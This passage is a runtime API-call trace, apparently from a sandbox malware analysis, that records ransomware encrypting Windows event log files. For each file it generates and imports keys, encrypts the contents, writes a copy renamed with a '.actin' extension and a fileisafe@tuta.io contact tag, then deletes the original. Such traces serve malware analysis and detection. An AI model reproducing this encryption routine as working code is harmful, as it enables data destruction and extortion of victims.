(lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 1 [0063.194] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0063.194] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0063.195] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0063.195] CloseHandle (hObject=0x2e4) returned 1 [0063.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 0x20 [0063.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.195] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0063.195] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.195] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.195] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.195] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71f00) returned 1 [0063.195] CryptSetKeyParam (hKey=0xf71f00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.195] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0063.583] CryptEncrypt (in: hKey=0xf71f00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0063.583] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0063.585] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71bc0) returned 1 [0063.585] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.585] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0063.585] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0063.585] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0063.585] CryptDestroyKey (hKey=0xf71f00) returned 1 [0063.585] CloseHandle (hObject=0x2e4) returned 1 [0063.585] CloseHandle (hObject=0x30c) returned 1 [0063.587] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 1 [0063.629] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0063.629] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.632] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0063.632] CloseHandle (hObject=0x338) returned 1 [0063.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 0x20 [0063.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.632] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.632] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.632] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.632] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.944] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c00) returned 1 [0063.944] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.944] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0063.946] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0063.946] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0063.948] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d00) returned 1 [0063.948] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.948] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0063.948] CryptDestroyKey (hKey=0xf71d00) returned 1 [0063.948] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0063.948] CryptDestroyKey (hKey=0xf71c00) returned 1 [0063.948] CloseHandle (hObject=0x338) returned 1 [0063.948] CloseHandle (hObject=0x30c) returned 1 [0063.950] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 1 [0063.952] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0063.952] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.952] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0063.952] CloseHandle (hObject=0x30c) returned 1 [0063.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 0x20 [0063.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.952] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.952] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.952] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.952] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.953] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d00) returned 1 [0063.953] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.953] ReadFile (in: hFile=0x30c, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0063.954] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0063.954] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0063.956] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72040) returned 1 [0063.956] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.956] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90, dwBufLen=0x90 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90) returned 1 [0063.956] CryptDestroyKey (hKey=0xf72040) returned 1 [0063.956] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x142, lpOverlapped=0x0) returned 1 [0063.956] CryptDestroyKey (hKey=0xf71d00) returned 1 [0063.956] CloseHandle (hObject=0x30c) returned 1 [0063.956] CloseHandle (hObject=0x338) returned 1 [0063.958] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 1 [0063.960] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0063.960] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.960] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1052672) returned 1 [0063.960] CloseHandle (hObject=0x338) returned 1 [0063.960] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 0x20 [0063.960] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.960] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0063.960] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.960] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.960] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.960] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d40) returned 1 [0063.961] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.961] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x101000, lpOverlapped=0x0) returned 1 [0064.159] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010, dwBufLen=0x101010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010) returned 1 [0064.160] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x101010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x101010, lpOverlapped=0x0) returned 1 [0064.180] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b80) returned 1 [0064.180] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0064.180] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90, dwBufLen=0x90 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90) returned 1 [0064.180] CryptDestroyKey (hKey=0xf71b80) returned 1 [0064.180] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x142, lpOverlapped=0x0) returned 1 [0064.180] CryptDestroyKey (hKey=0xf71d40) returned 1 [0064.180] CloseHandle (hObject=0x338) returned 1 [0064.180] CloseHandle (hObject=0x30c) returned 1 [0064.202] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx")) returned 1 [0064.392] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0064.392] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0064.603] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0064.620] CloseHandle (hObject=0x2e4) returned 1 [0064.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 0x20 [0064.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.727] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0064.727] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0064.727] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0064.727] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.172] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0065.172] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0065.172] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0065.176] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0065.176] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0065.179] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72000) returned 1 [0065.179] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0065.179] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0065.179] CryptDestroyKey (hKey=0xf72000) returned 1 [0065.179] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0065.179] CryptDestroyKey (hKey=0xf72100) returned 1 [0065.179] CloseHandle (hObject=0x2e4) returned 1 [0065.179] CloseHandle (hObject=0x30c) returned 1 [0065.182] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 1 [0065.183] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0065.183] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.184] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0065.184] CloseHandle (hObject=0x30c) returned 1 [0065.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 0x20 [0065.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.184] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.184] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0065.184] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0065.184] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.185] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71bc0) returned 1 [0065.185] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0065.185] ReadFile (in: hFile=0x30c, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0065.196] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0065.197] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0065.199] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72000) returned 1 [0065.200] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0065.200] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, 